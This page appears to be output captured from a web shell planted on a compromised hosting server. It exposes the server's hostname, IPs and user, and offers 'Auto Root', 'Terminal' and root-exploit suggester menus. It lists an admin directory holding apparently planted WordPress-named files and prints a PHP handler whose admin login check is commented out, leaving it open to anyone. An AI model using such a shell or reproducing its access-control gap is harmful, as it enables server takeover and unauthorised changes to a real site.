Linux spg1.cloudpowerdns.com 5.14.0-611.34.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 18 05:51:10 EST 2026 x86_64
LiteSpeed
Server IP : 176.9.63.151 & Your IP : 216.73.217.60
Domains :
Cant Read [ /etc/named.conf ]
User : fastear1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
fastear1 /
data sycho /
admin /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
197
B
-r--r--r--
2026-04-01 03:43
contact.php
9.39
KB
-rw-r--r--
2026-03-01 23:09
dashboard.php
12.62
KB
-rw-r--r--
2026-03-01 23:07
login.php
3.36
KB
-rw-r--r--
2026-03-01 20:35
logout.php
90
B
-rw-r--r--
2026-03-01 20:36
orders.php
24.63
KB
-rw-r--r--
2026-03-01 23:09
payment_methods.php
16.54
KB
-rw-r--r--
2026-03-01 23:03
save_contact.php
1.4
KB
-rw-r--r--
2026-03-01 20:30
services.php
15.75
KB
-rw-r--r--
2026-03-01 23:05
settings.php
6.88
KB
-rw-r--r--
2026-03-01 23:10
users.php
7.52
KB
-rw-r--r--
2026-03-01 23:08
verify_payment.php
13.79
KB
-rw-r--r--
2026-03-01 23:18
wp-blog-header.php
2.74
KB
-r--r--r--
2026-04-01 03:43
wp-cron.php
2.74
KB
-rw-r--r--
2026-04-01 03:43
Save
Rename
<?php include '../includes/db.php'; session_start(); // Mock Admin check // if(!isset($_SESSION['admin_id'])) { header('Location: login.php'); exit; } if ($_SERVER['REQUEST_METHOD'] == 'POST') { $email = $_POST['email']; $phone = $_POST['phone']; $location = $_POST['location']; $github = $_POST['github']; $linkedin = $_POST['linkedin']; $twitter = $_POST['twitter']; $social_links = json_encode([ 'github' => $github, 'linkedin' => $linkedin, 'twitter' => $twitter ]); try { // Check if settings exists $stmt = $pdo->query("SELECT id FROM contact_settings LIMIT 1"); $exists = $stmt->fetch(); if ($exists) { $stmt = $pdo->prepare("UPDATE contact_settings SET email = ?, phone = ?, address = ?, social_links = ? WHERE id = ?"); $stmt->execute([$email, $phone, $location, $social_links, $exists['id']]); } else { $stmt = $pdo->prepare("INSERT INTO contact_settings (email, phone, address, social_links) VALUES (?, ?, ?, ?)"); $stmt->execute([$email, $phone, $location, $social_links]); } header("Location: contact.php?success=1"); exit(); } catch (PDOException $e) { die("Propagation Error: " . $e->getMessage()); } } else { header("Location: contact.php"); exit(); } ?>